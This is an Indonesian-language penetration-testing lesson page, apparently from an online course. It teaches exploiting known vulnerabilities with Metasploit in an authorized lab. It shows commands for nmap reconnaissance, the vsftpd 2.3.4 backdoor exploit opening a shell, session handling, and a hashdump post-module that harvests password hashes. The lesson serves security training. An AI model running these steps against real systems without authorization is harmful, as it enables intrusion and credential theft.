0Pricing
Cyber Security Academy · Pelajaran

Mengeksploitasi Kerentanan yang Diketahui

Gunakan modul eksploitasi terhadap target rentan di laboratorium; tafsirkan keluaran sesi.

Mengeksploitasi Kerentanan yang Diketahui adalah pelajaran Cyber Security Academy gratis di CoddyKit. Ini adalah pelajaran 2 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Cyber Security Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Cyber Security Academy mencakup 4 pelajaran total.

Utamakan Etika dan Otorisasi

Eksploitasi hanya legal terhadap sistem yang Anda miliki atau yang secara tertulis telah memberikan otorisasi eksplisit untuk diuji. Semua contoh di sini ditujukan untuk lingkungan laboratorium yang diotorisasi. Eksploitasi tanpa otorisasi merupakan tindak pidana.

Rekomendasi Penyiapan Laboratorium

Gunakan VM yang sengaja dibuat rentan: Metasploitable2/3, DVWA, mesin VulnHub, atau HackTheBox/TryHackMe untuk latihan yang legal. Jangan pernah menguji sistem produksi atau sistem dunia nyata tanpa dokumen lingkup yang telah ditandatangani.

# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/

# Or use VulnHub
# https://www.vulnhub.com/

# Network: host-only adapter (isolated)

Pengintaian Sebelum Eksploitasi

Selalu lakukan enumerasi sebelum eksploitasi. Ketahui versi layanan, OS, dan konteks yang tepat sebelum memilih eksploitasi. Versi yang salah = eksploitasi gagal atau sistem mengalami kerusakan.

sudo nmap -sV -O 192.168.1.100

# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploit

Memilih Eksploitasi yang Tepat

Cari berdasarkan nama dan versi layanan. Utamakan modul dengan peringkat Excellent atau Great. Baca info untuk memastikan platform target dan rentang versinya sesuai.

msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent

msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Mengonfigurasi dan Menjalankan Eksploitasi

Tetapkan RHOSTS (target jarak jauh), LHOST (IP Anda untuk koneksi balik), LPORT (port pendengar), pilih muatan, lalu jalankan. Perhatikan pembuatan sesi atau pesan kesalahan.

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run

# [*] Command shell session 1 opened

Menafsirkan Hasil

Eksploitasi yang berhasil membuka sesi. Eksploitasi yang gagal menampilkan pesan kesalahan: koneksi ditolak (port tidak terbuka), eksploitasi gagal (versi salah), tidak ada sesi yang dibuat (muatan gagal terhubung kembali).

# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened

# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was created

Berinteraksi dengan Sesi

Setelah eksploitasi, berinteraksilah dengan sesi menggunakan sessions -i . Sesi shell perintah dasar menyediakan terminal; sesi Meterpreter menyediakan API yang kaya fitur.

msf6 > sessions          # list all sessions
msf6 > sessions -i 1     # interact with session 1

# Once inside:
id
whoami
ifconfig
uname -a

Menjalankan di Latar Belakang dan Beberapa Sesi

Tekan Ctrl+Z untuk menjalankan sesi di latar belakang dan kembali ke msfconsole. Dengan demikian, Anda dapat mengelola beberapa sesi atau menjalankan modul pascaeksploitasi terhadap sesi tertentu.

# Background active session
Ctrl+Z

# List sessions
msf6 > sessions

# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > run

Perintah Pemeriksaan

Banyak modul eksploitasi menerapkan perintah check yang menguji apakah target rentan tanpa benar-benar mengeksploitasinya. Selalu jalankan check terlebih dahulu jika tersedia.

msf6 exploit(ms17_010_eternalblue) > check

# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.

Pertimbangan Keandalan Eksploitasi

Eksploitasi dapat menghentikan layanan, memicu peringatan, atau meninggalkan catatan log. Dalam penilaian produksi: jadwalkan eksploitasi pada waktu lalu lintas rendah, siapkan rencana pengembalian, dan pastikan cadangan tersedia sebelum menjalankan apa pun yang merusak.

Mendokumentasikan Eksploitasi

Catat: stempel waktu, IP dan port target, modul eksploitasi yang digunakan, nomor CVE, muatan yang digunakan, sesi yang diperoleh, dan bukti (tangkapan layar atau keluaran terminal). Inilah bukti kerentanan Anda untuk laporan.

Pemeriksaan Singkat

Apa yang dilakukan perintah Metasploit "check"?

Ringkasan: Mengeksploitasi Kerentanan

Eksploitasi etis mengikuti alur yang jelas: dapatkan otorisasi tertulis, lakukan enumerasi dengan cermat, pilih eksploitasi yang sesuai, baca informasi modul, jalankan check terlebih dahulu jika tersedia, eksekusi, lalu dokumentasikan semuanya. Jangan pernah melakukan eksploitasi tanpa otorisasi — keterampilan teknis dan batas etika tidak dapat dipisahkan.

Pertanyaan yang Sering Diajukan

Apakah pelajaran “Mengeksploitasi Kerentanan yang Diketahui” gratis?

Ya — teks lengkap “Mengeksploitasi Kerentanan yang Diketahui” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Cyber Security Academy, upgrade ke CoddyKit PRO. Kursus Cyber Security Academy mencakup 4 pelajaran total.

Apa yang akan aku pelajari di “Mengeksploitasi Kerentanan yang Diketahui”?

Gunakan modul eksploitasi terhadap target rentan di laboratorium; tafsirkan keluaran sesi. Kamu berlatih Cyber Security Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.

Apakah aku perlu pengalaman untuk memulai Cyber Security Academy?

Tidak diperlukan pengalaman sebelumnya. Cyber Security Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 2 dari 4.

Berapa lama pelajaran “Mengeksploitasi Kerentanan yang Diketahui” memakan waktu?

Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.

Bisakah aku menulis dan menjalankan kode dalam pelajaran Cyber Security Academy ini?

Ya. Setiap pelajaran Cyber Security Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.

Semua pelajaran dalam kursus ini

  1. Arsitektur Metasploit dan msfconsole
  2. Mengeksploitasi Kerentanan yang Diketahui
  3. Muatan: Bertahap vs Tanpa Tahap, Meterpreter
  4. Pascaeksploitasi: Pivot dan Persistensi
← Kembali ke Cyber Security Academy